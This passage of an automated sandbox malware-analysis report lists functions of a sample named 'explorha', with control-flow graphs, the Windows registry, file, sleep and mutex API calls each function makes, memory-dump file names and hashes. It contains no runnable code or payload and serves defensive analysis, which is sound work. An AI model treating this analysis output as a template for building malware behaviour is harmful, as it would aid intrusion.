                                                                                                      control_flow_graph 2869 865e90-865f15 call 895780 RegOpenKeyExA 2872 865f17-865f40 RegQueryValueExA 2869->2872 2873 865f41-865f64 RegCloseKey 2869->2873 2872->2873 2874 865f67-865f6c 2873->2874 2874->2874 2875 865f6e-865f85 call 879750 2874->2875 2878 865f87-865f93 2875->2878 2879 865faf-865fc7 2875->2879 2880 865fa5-865fac call 87ecf8 2878->2880 2881 865f95-865fa3 2878->2881 2882 865ff1-86600c call 87e681 2879->2882 2883 865fc9-865fd5 2879->2883 2880->2879 2881->2880 2885 86600d-866012 call 8982fa 2881->2885 2887 865fe7-865fee call 87ecf8 2883->2887 2888 865fd7-865fe5 2883->2888 2887->2882 2888->2885 2888->2887
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 00865F0D
                                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00865F3B
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00865F47
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3677997916-0
                                                                                                      • Opcode ID: fa2d826a131e69be771c2754ed9ccd4fa9ef2a372e7215758bf133e042035a8b
                                                                                                      • Instruction ID: 348c718b8be42180d7ac95a2bb2cfd995601ea59fe0f8a0ee42cc7f13df0dc8f
                                                                                                      • Opcode Fuzzy Hash: fa2d826a131e69be771c2754ed9ccd4fa9ef2a372e7215758bf133e042035a8b
                                                                                                      • Instruction Fuzzy Hash: 0541D3B1510508ABEB28DF28CC41BED77B9FB45304F1082ACF919E76C1DB759A84CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869675 Relevance: 4.6, APIs: 3, Instructions: 131sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2895 869675-869695 GetFileAttributesA 2898 869697-8696a3 2895->2898 2899 8696c3-8696df 2895->2899 2902 8696a5-8696b3 2898->2902 2903 8696b9-8696c0 call 87ecf8 2898->2903 2900 8696e1-8696ed 2899->2900 2901 86970d-86972c 2899->2901 2906 869703-86970a call 87ecf8 2900->2906 2907 8696ef-8696fd 2900->2907 2908 86972e-86973a 2901->2908 2909 86975a-86a3e6 call 879750 2901->2909 2902->2903 2904 86a3ec 2902->2904 2903->2899 2911 86a423-86a458 Sleep CreateMutexA 2904->2911 2912 86a3ec call 8982fa 2904->2912 2906->2901 2907->2904 2907->2906 2915 869750-869757 call 87ecf8 2908->2915 2916 86973c-86974a 2908->2916 2923 86a45e-86a464 2911->2923 2912->2911 2915->2909 2916->2904 2916->2915 2925 86a466 2923->2925 2926 86a467-86a46f call 897cb9 2923->2926
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869678
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 303754bd131b3bff8715eb6caf91ceaa3c0b82538b573a091c80a48be9200239
                                                                                                      • Instruction ID: a941075b446f4329a90f7bc887b34ef3236ec9ec6de7db18bc4afe1eed0abc88
                                                                                                      • Opcode Fuzzy Hash: 303754bd131b3bff8715eb6caf91ceaa3c0b82538b573a091c80a48be9200239
                                                                                                      • Instruction Fuzzy Hash: 373146716102048BEB0CEF7CDD88BADBA6AFB85314F208218E058EB3D5C77599808B51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008697AA Relevance: 4.6, APIs: 3, Instructions: 130sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2929 8697aa-8697ca GetFileAttributesA 2932 8697cc-8697d8 2929->2932 2933 8697f8-869814 2929->2933 2936 8697ee-8697f5 call 87ecf8 2932->2936 2937 8697da-8697e8 2932->2937 2934 869816-869822 2933->2934 2935 869842-869861 2933->2935 2939 869824-869832 2934->2939 2940 869838-86983f call 87ecf8 2934->2940 2941 869863-86986f 2935->2941 2942 86988f-86a3e6 call 879750 2935->2942 2936->2933 2937->2936 2943 86a3f1 2937->2943 2939->2940 2939->2943 2940->2935 2948 869885-86988c call 87ecf8 2941->2948 2949 869871-86987f 2941->2949 2945 86a423-86a458 Sleep CreateMutexA 2943->2945 2946 86a3f1 call 8982fa 2943->2946 2957 86a45e-86a464 2945->2957 2946->2945 2948->2942 2949->2943 2949->2948 2959 86a466 2957->2959 2960 86a467-86a46f call 897cb9 2957->2960
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 008697AD
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: cd42925b9b3af5b06b2f13809cfb8bfc7ea5e1ad232da94de86ce4f0b1eb319a
                                                                                                      • Instruction ID: 5897bce82ac9ad75ed90d5f4450d2607119e2db0da7ab160a5beb7693b8a6382
                                                                                                      • Opcode Fuzzy Hash: cd42925b9b3af5b06b2f13809cfb8bfc7ea5e1ad232da94de86ce4f0b1eb319a
                                                                                                      • Instruction Fuzzy Hash: A33146716101048BEF0CDF6CDD887ADB666FF86314F20826CE458EB3D5C77599808B61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869A14 Relevance: 4.6, APIs: 3, Instructions: 128sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2963 869a14-869a34 GetFileAttributesA 2966 869a36-869a42 2963->2966 2967 869a62-869a7e 2963->2967 2968 869a44-869a52 2966->2968 2969 869a58-869a5f call 87ecf8 2966->2969 2970 869a80-869a8c 2967->2970 2971 869aac-869acb 2967->2971 2968->2969 2974 86a3fb 2968->2974 2969->2967 2976 869aa2-869aa9 call 87ecf8 2970->2976 2977 869a8e-869a9c 2970->2977 2972 869acd-869ad9 2971->2972 2973 869af9-86a3e6 call 879750 2971->2973 2978 869aef-869af6 call 87ecf8 2972->2978 2979 869adb-869ae9 2972->2979 2981 86a423-86a458 Sleep CreateMutexA 2974->2981 2982 86a3fb call 8982fa 2974->2982 2976->2971 2977->2974 2977->2976 2978->2973 2979->2974 2979->2978 2991 86a45e-86a464 2981->2991 2982->2981 2993 86a466 2991->2993 2994 86a467-86a46f call 897cb9 2991->2994
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869A17
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
